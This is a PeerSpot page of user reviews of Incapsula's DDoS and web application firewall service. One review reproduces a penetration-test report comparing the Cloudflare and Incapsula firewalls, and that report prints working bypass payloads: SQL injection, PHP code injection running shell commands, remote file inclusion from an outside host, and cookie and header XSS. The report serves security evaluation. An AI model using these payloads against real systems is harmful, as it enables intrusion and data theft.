it_user302106 - PeerSpot reviewer
Application Development Manager at a financial services firm with 501-1,000 employees
Vendor
We're using it to replace Barracuda Web App Firewall which we retired several years ago.

What is most valuable?

I'd say that the most valuable feature is the ease of use in configuration, the analytics, and the integration with Incapsula’s robot database.

How has it helped my organization?

The product should be able to protect us from illegitimate web traffic, and reduce our data center costs through lowering the load on our systems.

What needs improvement?

The interface seems a bit outdated and simplistic.

For how long have I used the solution?

I have been familiar with it for a few months now.

Buyer's Guide
Distributed Denial of Service (DDOS) Protection
April 2024
Find out what your peers are saying about Imperva, Cloudflare, NETSCOUT and others in Distributed Denial of Service (DDOS) Protection. Updated: April 2024.
769,479 professionals have used our research since 2012.

What was my experience with deployment of the solution?

No issues with deployment.

What do I think about the stability of the solution?

No issues with stability.

What do I think about the scalability of the solution?

No issues with scalability thus far; we haven’t tried yet.

How are customer service and support?

Customer Service:

Fairly low – I’m in between Incapsula sales people so it’s hard to answer, but I have had trouble getting answers to my questions.

I like the product so I am happy with that but getting to them was not simple.

Technical Support:

They had one thing they had to do and they did that – was pretty straightforward.

Which solution did I use previously and why did I switch?

Yes, we were using Barracuda Web App Firewall which we retired several years ago.

How was the initial setup?

It was straightforward.

What about the implementation team?

I implemented on my own.

What's my experience with pricing, setup cost, and licensing?

Per month, the cost varies between $200 to $2,000, and there's no initial setup cost.

What other advice do I have?

I would say compare it to other solutions in the marketplace feature by feature and see how Incapsula reporting and analytics dashboards compare and bot control compares – their solution for bot control is pretty good – and check those features with other enterprise level solutions, you get a lot for your money.

Disclosure: PeerSpot contacted the reviewer to collect the review and to validate authenticity. The reviewer was referred by the vendor, but the review is not subject to editing or approval by the vendor.
PeerSpot user
it_user298446 - PeerSpot reviewer
VP R&D with 51-200 employees
Vendor
They don't require us to move our DNS service to them like other services do, allowing us to maintain our network in our current configuration.

Valuable Features

The features that are most valuable are the protection against denial-of-service attacks and all kinds of other internet attacks. The presence of Incapsula helps us answer the compliance requirements for IT security, as our clients require IT security compliance, and it's very important to our enterprise customers that we comply with the requirements.

Improvements to My Organization

Another important feature is that it doesn’t require us to move our DNS service to Incapsula like other services. It allows us to maintain our network in our current configuration. It works well with the Amazon cloud we use and doesn’t require us to re-configure our network.

Room for Improvement

Its user interface could be improved, as the competition looks better, but it doesn’t really need improvements in its functionality. We would like to have more reports and real-time views. Basically, the core functionality is great.

Use of Solution

We have been using the solution for six months.

Deployment Issues

No issues encountered.

Stability Issues

As far as I can see it's got great stability.

Scalability Issues

No issues with the scalability.

Customer Service and Technical Support

Customer Service:

8/10 – they were responsive.

Technical Support:

8/10

Initial Setup

It doesn’t require any changes in code, so it's very easy to implement.

Implementation Team

We implemented it by ourselves, and it took an hour, and was very easy.

ROI

It's very difficult in security products to evaluate the ROI, but we definitely feel it has helped us with compliance – we get projects and customers we wouldn’t get if we didn’t have Incapsula. It's not something you can measure – we have no other option but to use the solution, it’s a necessity.

Other Solutions Considered

We tried the competition, Cloudflare, we even used them, but Incapsula is more suitable to use for web/mobile applications, and that is how we use it.

Disclosure: PeerSpot contacted the reviewer to collect the review and to validate authenticity. The reviewer was referred by the vendor, but the review is not subject to editing or approval by the vendor.
PeerSpot user
Buyer's Guide
Distributed Denial of Service (DDOS) Protection
April 2024
Find out what your peers are saying about Imperva, Cloudflare, NETSCOUT and others in Distributed Denial of Service (DDOS) Protection. Updated: April 2024.
769,479 professionals have used our research since 2012.
PeerSpot user
Director at a marketing services firm with 51-200 employees
Vendor
It provides intelligence on bad IPS and malicious software, and scales without issue.

What is most valuable?

  • Human contact
  • Fast SLA
  • Trustworthy and excellent communication

Highly-functional back office with user friendly reports and intelligence on bad IPS and malicious software is at very high level and very quick. Part of the solutions function is that they have to stay on top of the data intelligence game. They have the first knowledge of break points.

How has it helped my organization?

The product makes information readily available and mitigates any problems quickly.

What needs improvement?

With the way that protection works, there is no such thing as pure protection, but as soon as Incapsula knows what a problem looks like, they fix it. They have to stay on top of the data intelligence game.

For how long have I used the solution?

I've used it for three years.

What was my experience with deployment of the solution?

It's usually fast but it can take two to three days on a big operation to get it live, especially if there is tracking.

What do I think about the scalability of the solution?

No problem with scalability.

How are customer service and technical support?

Customer Service:

Communication declined a bit as they got bigger – 7/10. Service is really good though.

Technical Support:

8/10. Service is good.

Which solution did I use previously and why did I switch?

We went through at least a quarter million dollars in DDoS firewalls before we got to them. We tried solutions worldwide.

What's my experience with pricing, setup cost, and licensing?

For enterprise level stuff pricing is very competitive. Very good corporate deals.

What other advice do I have?

Go for it if you’re looking into it – they are a good solution and are trustworthy people. Just really works.

Disclosure: I am a real user, and this review is based on my own experience and opinions.
PeerSpot user
it_user277947 - PeerSpot reviewer
Online Marketing Manager with 1,001-5,000 employees
Vendor
The user-generated spam stopped after we started using it to speed up and protect our website.

What is most valuable?

Their WAS - I had a problem and I turned to Incapsula. I needed someone to protect the website and they succeeded in this regard.

How has it helped my organization?

We’re not an e-commerce site, but a website for providing information, and we needed someone to protect the website. The user-generated spam stopped after we started using Incapsula, and so we feel more secure.

What needs improvement?

I needed some support and according to the SLA and I couldn’t get telephone support and it took a little while till they got back to me. We’re an enterprise company so I think I would be happier for a bit more support to pick the phone up and ask a question. There was not as much back office help as we would have liked.

For how long have I used the solution?

I’ve used it for four months.

What was my experience with deployment of the solution?

Yes, we had some down time but we solved it. It took us a few hours although we were promised no down time.

What do I think about the stability of the solution?

No issues with stability, but I still have to look into whether the site speed was faster than it was before as promised.

What do I think about the scalability of the solution?

No issues with scalability.

How are customer service and technical support?

Customer Service:

8/10 – very professional.

Technical Support:

8/10 – very professional once they got back to me.

Which solution did I use previously and why did I switch?

I didn’t use any other solution.

What's my experience with pricing, setup cost, and licensing?

It’s not costly for my needs.

Which other solutions did I evaluate?

I knew the solutions available in the market because I was working in a cyber-security company. I suggested the product, because I knew the product and that they are better than other solutions for my needs.

What other advice do I have?

Do it on a Sunday in case there is down time. I would ask for support after implementation, and check that the site speed is as fast as it should be.

Disclosure: PeerSpot contacted the reviewer to collect the review and to validate authenticity. The reviewer was referred by the vendor, but the review is not subject to editing or approval by the vendor.
PeerSpot user
it_user68487 - PeerSpot reviewer
Security Expert with 51-200 employees
Vendor
CloudFlare vs Incapsula: Web Application Firewall

CloudFlare vs Incapsula: Round 2
Web Application Firewall

Comparative Penetration Testing Analysis Report v1.0

Summary

This document contains the results of a second comparative penetration test conducted by a team of security specialists at Zero Science Lab against two cloud-based Web Application Firewall (WAF) solutions: Incapsula and Cloudflare. This test was designed to bypass security controls in place, in any possible way, circumventing whatever filters they have. Given the rise in application-level attacks, the goal of the test was to provide IT managers of online businesses with a comparison of these WAFs against real-world threats in simulated real-world conditions.

Zero Science Lab is a Macedonian Information Security Research and Development Laboratory that specializes in information security hardening, consulting, network security, vulnerability research, software and hardware security assessment, penetration testing, malware analysis, forensics and much more - https://www.zeroscience.mk

Background
In February 2013, we conducted the first comparative pentest analysis of the CloudFlare, Incapsula and ModSecurity Web Application Firewall (WAF) solutions. The goal of a WAF is to block hacker attacks / unwanted malicious traffic to your web application with as few false positives as possible.

Since then, all three vendors had replied to the findings, applying patches to the discovered bypasses and improving their products to protect their customers from web attacks. In August 2013, CloudFlare even launched a new rule- based WAF to augment their existing heuristics-based WAF (which we used in the first pentest). Since Incapsula also uses a rule-based approach, we decided that now is a good time to run a follow-up pentest comparison, this time focusing only on CloudFlare's new WAF and Incapsula's WAF. Over the past 8 months, both vendors have improved their firewall solution by adding extra features, upgrading the rulesets and signature detection algorithms.

The difference between this report and the previous one is that now we have focused more on real-world web application exploitation applying known encoding techniques, as well as the rate of false positives.

Results

1. Attack Vector coverage
The table below shows the overall statistics of the exploits testing:

2. WAF evasion techniques
Blackbox penetration test was conducted against the two services (using their respective Business Plans), applying known filter evasion techniques to bypass their web application firewall solution using real-world scenarios and variety of attack vectors.

We wanted to check how the WAFs deal with evasion techniques, and we took common vectors for each rule and obfuscated them using different evasion techniques like:

  • Multi-parameter vectors
  • Microsoft Unicode encoding
  • Invalid characters
  • SQL comments
  • Redundant white space
  • HTML encoding for XSS
  • Javascript escaping for XSS
  • Hex encoding for XSS
  • Character encoding for Directory Traversal

3. Known Vulnerabilities Handling
Each of the exploits was executed with their default given payload. After that, we applied the evasion techniques on the same payloads and mark the results. Below is a table that gives you an overview of which vulnerability was blocked and which vulnerability has bypassed the WAF mechanisms for detecting known web application exploits.

Results (overview of real apps exploit bypass list):

4. FalsePositives
Obviously a key evaluation criteria for a WAF is to be able to block as many attack variants as possible. However, in real life scenarios there is another evaluation criteria that is as important – not blocking legitimate users.

Testing for false positives is not a trivial task and the way we have decided to run this test is to simulate an administrator that is updating the application HTML. You would find this action in any CMS and it is specifically prone to false positives in XSS filters that look for suspicious HTML and Javascript code.

From our tests it seems that Incapsula has a mechanism to detect what CMS is installed on the web server and to automatically detect and whitelist legitimate administrative actions.

On the other hand CloudFlare’s aggressive XSS filter blocked legitimate attempts to upload HTML and Javascript code to the application through the CMS built in functions.

Conclusion
From the results table, we can see that Incapsula's WAF continues to have an advantage over CloudFlare's WAF. We should also mention that only Incapsula's WAF is PCI-Certified, which is an advantage for certain types of online businesses.

While CloudFlare's new WAF solution showed substantial improvement since the first penetration test, it still does not provide the comprehensive level of security against certain types of web application attacks (e.g., SQL injection, Remote File Inclusion) that many online businesses today require.

We noticed the high block ratio of XSS attacks, but from all the types of attacks, main focus was on Cross-Site Scripting. The SQL Injection, Local and Remote File Inclusion, and Remote Code/Command Execution attacks had very low detection rate by the CloudFlare WAF.

Incapsula, on the other hand, has shown consistent security performance in both tests, with a high block ratio and few false-positives.

Intro
Both Incapsula and CloudFlare WAF services have improved their protection mechanisms and detection methodologies since the previous evaluation. That being said, we decided to put them on yet another heavy test and see what filters we can evade/bypass. All the settings were set to maximum level of protection in both testing environments.

This time we used several real-world applications vulnerable to different types of attack vectors to simulate a real hacking scenario against the firewall services of both vendors.

Along with the vulnerable applications, we used an improved PoC script file to test the solutions against generic attack vectors and their learning mechanisms. This script was written by us and it basically allows calling unsanitized input from the users which allowed us to exploit it and manipulate the results in several ways which would confirm 100% whether or not the filter was indeed working as expected.

Setup and configuration
We're not going in details on how to setup CloudFlare and Incapsula services. Refer to the previous report for more details. All we can say here is that the infrastructure design has remained the same which is the WAF sitting in front of the dedicated server, intercepting all requests that are destined for it. The setup process from client's perspective has stayed the same as well. We've set everything to 'ON' and 'HIGH' for both WAF options.

CloudFlare WAF Settings

Incapsula WAF Settings

Targets and tools
For this occasion we've created two separate testbeds on separate server host machines.

- CloudFlare - cf.destr0y.net

- Incapsula - in.zeroscience.mk, inc.zeroscience.mk, inc.destr0y.net, 4sylum.elgringodelanoche.com

The testbed servers were running Apache web server with PHP and MySQL DBMS. Both the servers had the 'poc.php' script deployed, which is vulnerable to Cross-Site Scripting, SQL Injection, Local and Remote File Inclusion, Cookie Poisoning and Command Execution attacks. We also installed several real-world web applications that are vulnerable to different attack vectors.

Practico CMS 13.7 Auth Bypass SQL Injection - by shiZheni (https://www.exploit-db.com/exploits/28129)
Practico CMS contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the index.php script not properly sanitizing user-supplied input to the 'uid' parameter. This may allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.

WP NOSpamPTI Plugin Blind SQL Injection - by Alexandro Silva (https://www.exploit-db.com/exploits/28485)
NOSpamPTI contains a flaw that may allow an attacker to carry out a Blind SQL injection attack. The issue is due to the wp- comments-post.php script not properly sanitizing the comment_post_ID in POST data. This may allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.

WP TimThumb Plugin Remote Code Execution - by Mark Maunder (https://www.exploit-db.com/exploits/17602)
TimThumb is prone to a Remote Code Execution vulnerability, due to the script does not check remotely cached files properly. By crafting a special image file with a valid MIME-type, and appending a PHP file at the end of this, it is possible to fool TimThumb into believing that it is a legitimate image, thus caching it locally in the cache directory.

WP W3 Total Cache Plugin PHP Code Execution - by Unknown (https://osvdb.org/show/osvdb/92652) W3 Total Cache Plugin for WordPress contains a flaw that is due to the program failing to properly restrict access to the mclude
and mfunc PHP code inclusion macros. This may allow a remote attacker to insert and execute arbitrary PHP code.

webgrind 1.0 Local File Inclusion Vulnerability - by Michael Meyer (https://www.exploit-db.com/exploits/18523)
webgrind suffers from a file inclusion vulnerability (LFI) when input passed thru the 'file' parameter to index.php is not properly verified before being used to include files. This can be exploited to include files from local resources with directory traversal attacks and URL encoded NULL bytes.

Newsletter Tailor 0.2.0 Remote File Inclusion - by Snakespc (https://www.exploit-db.com/exploits/11378)
Newsletter Tailor contains a flaw that may allow a remote attacker to execute arbitrary commands or code. The issue is due to the index.php script not properly sanitizing user input supplied to the 'p' parameter. This may allow an attacker to include a file from a third-party remote host that contains commands or code that will be executed by the vulnerable script with the same privileges as the web server.

Apache Struts <2.2.0 Command Execution - by Meder Kydyraliev (https://www.exploit-db.com/exploits/14360)
Apache Struts versions < 2.2.0 suffers from a remote command execution vulnerability. This issue is caused by a failure to properly handle unicode characters in OGNL extensive expressions passed to the web server. By sending a specially crafted request to the Struts application it is possible to bypass the "#" restriction on ParameterInterceptors by using OGNL context variables. Bypassing this restriction allows for the execution of arbitrary Java code.

Apache Struts includeParams RCE < 2.3.14.2 - by Eric K., Douglas R. (https://www.osvdb.org/show/osvdb/93645)
Apache Struts contains a flaw that may allow an attacker to execute arbitrary commands. The issue is due to the handling of the includeParams attribute in the URL and Anchor tags. With a specially crafted request parameter, an attacker could inject arbitrary OGNL code that would be evaluated. In addition, a second evaluation of attacker supplied input can occur when the URL or Anchor tag tries to resolve arbitrary parameters, that would be evaluated as an OGNL expression.

Apache Struts < 2.2.3 Multiple RCE - by Takeshi Terada (https://www.securityfocus.com/bid/61189) Apache Struts is prone to multiple remote command-execution vulnerabilities. Successful exploits will allow remote attackers to
execute arbitrary commands within the context of the affected application.

GLPI < 0.84.1 Arbitrary PHP Code Injection - by High-Tech Bridge SA (https://www.exploit-db.com/exploits/28685)
GLPI suffers from an insufficient validation of user-supplied input passed to the "db_host", "db_user", "db_pass", and "databasename" HTTP POST parameters via "/install/install.php" script [that is present by default after application installation] before writing data into "/config_db.php" file. A remote attacker can inject and execute arbitrary PHP code on the vulnerable system.

Joomla CMS 3.1.5, WordPress 3.6.1 and phpMyAdmin 4.0.8 - False Positives Front

99% of the test was manually approached, but we used several tools for fuzzing and automation to see how the WAFs will behave on scanners and session tracking.

Tools used:

  • Acunetix Web Vulnerability Scanner
  • Havij SQL Injection Tool
  • Burp Suite
  • OWASP Zed Attack Proxy (ZAP)
  • TamperData
  • Firebug
  • Cookies Manager+
  • CookieMonster
  • HttpFox
  • Live HTTP Headers
  • tcpdump
  • Wireshark
  • Metasploit Framework

We used the following browsers:

  • Mozilla Firefox
  • Microsoft Internet Explorer
  • Google Chrome
  • Opera
  • Apple Safari
  • Iceweasel

Contents of poc.php:

(click to enlarge)

Testing and analysis
From previous report, Incapsula patched the bypasses and has improved their WAF and even included a new separate control for RFI attacks.

CloudFlare having in mind our previous results has introduced a much improved WAF based on OWASP Core Rule Set (ModSecurity). However, there are lots of bypasses present in the newly upgraded WAF solution. We noticed only a few false positives in CloudFlare while doing regular tasks, using a legitimate application from regular user's perspective. Given the fact that the False Positives test was executed using phpMyAdmin, this was more than expected.

Incapsula on the other hand had also a few false positives, including simple Joomla administrator actions. Unlike Cloudflare, Incapsula offers a great option for whitelisting the request URL and the affected parameter, which allows the WAF administrator to resolve incidents of this kind at any time.

What’s also important to note is that Incapsula can recognize an ongoing attack and block attacker's session. We specifically noticed this during the test using automated tools such as ZAP and Burp. Their blocking mechanism seems to be based on recognizing the fingerprint of the tool being used, so even if you try to trick it by changing the default User-Agent or manipulating other header fields, the WAF will still block your session. We didn't notice such mechanism on CloudFlare's WAF. CloudFlare blocks a session only if an attacker tries to manipulate and send invalid headers.

XSS vectors:

- Vectors making use of HTML5 features

- Vectors working on HTML4 and older versions

- Cascading stylesheet injection based vectors

- Plain JavaScript vectors

- E4X vectors working on gecko based browsers

- Vectors attacking DOM properties and methods

- JSON based vectors

- Vectors embedded in SVG files

- Vectors related to X(HT)ML

- UTF7 and other exotic charset based vectors

- Client side denial of service vectors

- HTML behavior and binding vectors

- Clickjacking and UI Redressing vectors

Results (CloudFlare):


Webgrind Local File Inclusion Bypass:
https://cf.destr0y.net/webgrind/index.php?file=/etc...

GLPI SQL Injection and Remote Code Execution Bypass:

<form action="https://cf.destr0y.net/glpi/install/install.php" method="post" name="main"> <input type="hidden" name="install" value="update_1"> <input type="hidden" name="db_host" value="'; } passthru($_GET['cmd']); /*"> <input type="submit" id="btn"> </form> <p> <img src="https://s3-us-west-2.amazonaws.com/itcs-data/posting_images/images/original/29496/wafreport2013v2-008.png" width="650"> </p>

https://cf.destr0y.net/glpi/index.php?cmd=ls%20-la;...

Newsletter Tailor Remote File Inclusion Bypass:
https://cf.destr0y.net/list/admin/index.php?p=http:...

https://cf.destr0y.net/list/admin/index.php?p=http:...

Practico SQL Injection Authentication Bypass:

POST /practico/ HTTP/1.1 Host: cf.destr0y.net Content-Type: application/x-www-form-urlencoded Content-Length: 73 Connection: keep-alive Accept-Encoding: gzip, deflate accion=Iniciar_login&uid=admin%27+AND+1%3D1%23&clave=password&captcha=vhw3 <p> <img src="https://s3-us-west-2.amazonaws.com/itcs-data/posting_images/images/original/29496/wafreport2013v2-012.jpg" width="650"> </p>

TimThumb Remote File Include Bypass:
https://cf.destr0y.net/wp/wp- content/plugins/timthumb/cache/external_3ad96be987d746db968ebaa77c49900e.php

WP Plugin NoSpamPTI Blind SQL Injection Bypass:

<form novalidate="" id="commentform" method="post" action="https://cf.destr0y.net/wp/wp-comments-post.php"> <input type="submit" value="Post Comment" id="submit" name="submit"> <input type="hidden" id="comment_post_ID" value="1 AND SLEEP(15)" name="comment_post_ID"><br> <input type="hidden" value="0" id="comment_parent" name="comment_parent"> </form> <p> <img src="https://s3-us-west-2.amazonaws.com/itcs-data/posting_images/images/original/29496/wafreport2013v2-014.jpg" width="650"> <img src="https://s3-us-west-2.amazonaws.com/itcs-data/posting_images/images/original/29496/wafreport2013v2-015.png" width="650"> </p>

Cookie Poisoning Bypass (XSS, SQLi, RFI, LFI, CMDexec):

CloudFlare doesn't check the Cookie value or any other HTTP header field (except User-Agent) for malicious strings. To prove this, we successfully managed to exploit the cookie vulnerabilities in the PoC script.

Cookie XSS Bypass:

Cookie value: hallo=J0xy0L </h2><script>alert(document.cookie)</script>

Cookie CMDExec Bypass:

Cookie value: market=uname -a;

Cookie LFI/RFI Bypass:
Cookie value: segment=https://zeroscience.mk/pentest/tim.php

Cookie SQLi Bypass:
Cookie value: notifications=dasdsa' union select* from testwaf;#

Directory Traversal Bypass using Burp:

Apache Struts Block (msf):

SQL Injection Fuzz (ZAP) Block:

WP W3 Total Cache Plugin PHP Code Execution Block:

<textarea aria-required="true" rows="8" cols="45" name="comment" id="comment"><!--mfunc eval(base64_decode(cGhwaW5mbygpOyAg)); --><!--/mfunc--></textarea>

User-Agent HTTP Header Field XSS Block:
UA value: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0"><script>alert(1);</script>

False Positive (phpMyAdmin):
https://cf.destr0y.net/phpma/querywindow.php?token=... &table=testwaf&sql_query=SELECT%20*%20FROM%20%60testwaf%60%20WHERE%20%60testzsl%60%3D1&init=1 (?)

Unlike Incapsula, CloudFlare does not offer an option to whitelist the requests and parameters but rather whitelist the IP of the user.

Results (Incapsula):

Webgrind Local File Inclusion Bypass:

Seems its configured to detect and trigger on hardcoded values (I.E: /etc/hosts, /etc/passwd). The vulnerability can still be used to read other valuable files on the system. For example:
https://in.zeroscience.mk/webgrind/index.php?op=fil...

GLPI SQL Injection and Remote Code Execution Bypass:


<form action="https://inc.destr0y.net/glpi/install/install.php" method="post" name="main">

<input type="hidden" name="install" value="update_1">

<input type="hidden" name="db_host" value="'; } passthru($_GET['cmd']); /*">

<input type="submit" id="btn">

</form>

GLPI SQL Injection and Remote Code Execution Bypass:

POST /practico/ HTTP/1.1

Host: 4sylum.elgringodelanoche.com

Content-Type: application/x-www-form-urlencoded

accion=Iniciar_login&uid=admin' AND 230984752 = 230984752#&clave=admin&captcha=rxbg

Accept-Encoding HTTP Header Field XSS Bypass:
AE value: gzip, deflate"><script>alert(1);</script>

User-Agent HTTP Header Field XSS Bypass:
UA value: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0"><script>alert(document.cookie)</script>

Remote File Include Bypass (questionable (captcha)):

Apache Struts Block (tcpdump):

Cross-Site Scripting Bypass:

Cross-Site Scripting Bypass:
https://inc.zeroscience.mk/poc.php?x=%3Cform%20id=t... %3Cbutton%20form=test%20onformchange=alert(/XSS/)%3EX%3C/button%3E

XSS Fuzz (Burp) Block:

WP Plugin NoSpamPTI Blind SQL Injection Block:

<form novalidate="" id="commentform" method="post" action="https://in.zeroscience.mk/wp/wp-comments-post.php"> <input type="submit" value="Post Comment" id="submit" name="submit"> <input type="hidden" id="comment_post_ID" value="1 AND SLEEP(15)" name="comment_post_ID"> <input type="hidden" value="0" id="comment_parent" name="comment_parent"> </form>

Newsletter Tailor Remote File Inclusion Block:
https://in.zeroscience.mk/list/admin/index.php?p=ht...

TimThumb Remote File Include Block:
https://in.zeroscience.mk/wp/wp- content/plugins/timthumb/timthumb.php?src=https://zeroscience.mk/pentest/tim.php.php

WP W3 Total Cache Plugin PHP Code Execution Block:

<textarea aria-required="true" rows="8" cols="45" name="comment" id="comment"><!--mfunc eval(base64_decode(cGhwaW5mbygpOyAg)); --><!--/mfunc--></textarea>

False Positive (Joomla):

Due to suspicious values being hardcoded as even triggers, Incapsula blocks legitimate access to applications with those keywords in the content/paylod.

For example, any comments in blogs or web content containing any of these keywords will cause Incapsula to deny access. As an example, any IT helpdesk blog with content containing strings such as /etc/passwd, /etc/hosts.

Access denied was presented to us when saving the global configuration in Joomla CMS because of the POST parameter 'jform[sendmail]' with value: /usr/sbin/sendmail...also when tried to install any extension we get blocked, but we can add the parameter and the request URL to the whitelist excluding this particular false positive.

POST https://in.zeroscience.mk/joomla/administrator/ind... HTTP/1.1 - jform[sendmail]=/usr/sbin/sendmail

POST https://in.zeroscience.mk/joomla/administrator/ind... - joomla extension install (RFI FP)

Afterthoughts

We can conclude and confirm that both solutions have improved over the course of this year. And that’s really good to see. Incapsula has invested more into blocking real life attacks on real apps. Their session blocks works pretty good against automated attacks but it didn’t block our sessions while doing the manual testing. They might want to put some more effort into that.

CloudFlare has made a big step forward by introducing a new WAF solution knowing that in the previous result they were rock bottom and basically didn’t stop any attacks. Their new solution is fine but they still have lots of work to do and put it on Incapsula level.

We also noticed that CloudFlare has a high protection rate for XSS attacks than SQLi and LFI/RFI combined.

As we’ve shown in the Results part, both Incapsula and CloudFlare, don’t block malicious request with values sent in HTTP Headers. This leaves an open door for attacker to exploit vulnerabilities of such kind. We specifically tested this with Cookie XSS, LFI, RFI, CMD Execution vulnerabilities in the PoC script. Here is a list of few public cookie poisoning vulnerabilities to show the real life relevance of this issue:

For References and Appendix see: https://zeroscience.mk/files/wafreport2013v2.pdf

Disclosure: I am a real user, and this review is based on my own experience and opinions.
PeerSpot user
it_user3876 - PeerSpot reviewer
it_user3876Database Manager at a tech company with 51-200 employees
Vendor

For domain verification, CloudFlare has an upper hand on Incapsula.

CloudFlare works in close collaboration with major web hosting companies around the world, so the verification in CloudFlare is easier and speedy.

See all 4 comments
Sr Associate Information Security at a tech services company with 51-200 employees
Real User
A stable solution with good DDoS protection and recently improved technical support
Pros and Cons
  • "Scalability is pretty easy on the base platform. You just add another, and you're ready to go."
  • "The solution needs to improve Integration with third parties for their on-prem deployment models. The integration is not that good yet."

What is most valuable?

The solution has good DDoS protection, and some good common features, such as no attack surfaces, parameter sanitization, and attack analytics.

What needs improvement?

The dashboard of the solution is complex. It is complex in the sense that there are too many options. There are two types of Incapsula dashboards. One is the on-prem version and one is cloud-based. Cloud-based is okay. The on-prem one needs some work.

The solution needs to improve Integration with third parties for their on-prem deployment models. The integration is not that good yet.

For how long have I used the solution?

I've been using the solution for one year.

What do I think about the stability of the solution?

The solution is stable.

What do I think about the scalability of the solution?

Scalability is pretty easy on the base platform. You just add another, and you're ready to go. We deal mostly with enterprise-level clients.

How are customer service and technical support?

The company has really improved its technical support over the past year. Before that, I wouldn't rate them as very good, but they are much better now.

How was the initial setup?

The difficulty of the initial setup depends on the customer. If it's a complex environment that they're processing, and/or if there's a downtime period, it may take more or less time. It depends on the number of applications that we have to integrate as well. 

What other advice do I have?

We are Imperva partners, so we work with clients that use different deployment models, including on-premises and cloud.

I'd recommend to those considering implementation to look at your organization's requirements and then compare your options.

I would rate the solution 7.5 or eight out of ten.

Disclosure: My company has a business relationship with this vendor other than being a customer: Partner.
PeerSpot user
PeerSpot user
Service Manager at a tech services company with 51-200 employees
Consultant
Provides PCI-level IDS/IPS.

What is most valuable?

  • Easy-to-set-up CDN with PCI-level IDS/IPS

How has it helped my organization?

We offer Incapsula for every customer project we host, as a default.

What needs improvement?

The default service is great!

For how long have I used the solution?

I have used it for two years.

What was my experience with deployment of the solution?

Sometimes, the SSL setup can be a bit slow/inconsistent.

What do I think about the stability of the solution?

There was only one minor incident with service availability, if I remember correctly.

What do I think about the scalability of the solution?

Nope; we have not encountered any scalability issues.

How are customer service and technical support?

Customer Service:

Some tickets seem to hang for some reason and some of the more-technical tickets seem to go through lot of different people before they get solved, but generally the customer service has been good.

Technical Support:

General documentation is good enough that we haven't needed technical support that much, but the answers have been good once you go through the "Off-the-shelf" answers.

Which solution did I use previously and why did I switch?

We did try CloudFlare, but the pricing didn't suit our use case too well.

How was the initial setup?

The initial setup is fairly straightforward for a technical person.

What about the implementation team?

An in-house team implemented it all the way.

What was our ROI?

ROI is ~90%.

What's my experience with pricing, setup cost, and licensing?

Pricing is a good match for the features we use.

Which other solutions did I evaluate?

Before choosing this product, we also evaluated CloudFlare because it appeared first in Google.

What other advice do I have?

Basic setup is simple but, as with any caching/WAF setup, there are tricks you need to learn. But it works really nice out of the box!

Disclosure: I am a real user, and this review is based on my own experience and opinions.
PeerSpot user
it_user277953 - PeerSpot reviewer
ICT Director with 501-1,000 employees
Vendor
We've had no compromises to our website and services from potential threats, hackers, etc. as the Web Application firewall has been effective.

What is most valuable?

The Web Application firewall is a valuable feature as the security features are mostly what we're interested in.

How has it helped my organization?

We hope that the product helps protect us from potential threats, hackers etc. that compromise our website and services. We want peace of mind. The fact that nothing has occurred is a good thing.

What needs improvement?

We’ve had a few, short outages that didn't have an impact on the business. One outage lasted a couple of hours, so the reliability could be improved.

At times, we can prove the service is not running, but technical support doesn’t reflect that fact. We appreciate that nothing is 100% reliable, but we'd appreciate more information during an outage and not after the fact.

Also, reporting could be improved. We shouldn’t have to look on Twitter to see if others are experiencing a similar issue. Greater transparency is needed when there is an issue.

For how long have I used the solution?

I've used it for about two years.

What was my experience with deployment of the solution?

No issues at all.

What do I think about the stability of the solution?

We have had a few outages.

What do I think about the scalability of the solution?

No issues on that front as we haven’t needed to scale it.

How are customer service and technical support?

Customer Service:

Average to poor.

Technical Support:

Average to poor.

Which solution did I use previously and why did I switch?

Yes, we used Barracuda. The product was not difficult to configure but it didn’t work well. There was high latency in the product.

How was the initial setup?

It was straightforward.

What's my experience with pricing, setup cost, and licensing?

Cost is OK. It’s more expensive than CloudFlare and Amazon but it’s got better features. We are happy with the price, its just the information and reliability, otherwise we would be happy to give a glowing recommendation.

Which other solutions did I evaluate?

We looked at CloudFlare, but they don’t offer the same security features. Incapsula was selected because of the uniqueness of the security features.

What other advice do I have?

I think it’s a leading product, a market leader; that’s how it feels to us. But I don’t think it would be a good product if i'ts mission critical. You'd need to proceed with a certain amount of caution because we haven’t had 100% uptime.

Disclosure: PeerSpot contacted the reviewer to collect the review and to validate authenticity. The reviewer was referred by the vendor, but the review is not subject to editing or approval by the vendor.
PeerSpot user
it_user71820 - PeerSpot reviewer
it_user71820Works at a tech company with 51-200 employees
Vendor

Regarding transparency - checkout status.incapsula.com

Buyer's Guide
Download our free Distributed Denial of Service (DDOS) Protection Report and find out what your peers are saying about Imperva, Cloudflare, NETSCOUT, and more!
Updated: April 2024
Buyer's Guide
Download our free Distributed Denial of Service (DDOS) Protection Report and find out what your peers are saying about Imperva, Cloudflare, NETSCOUT, and more!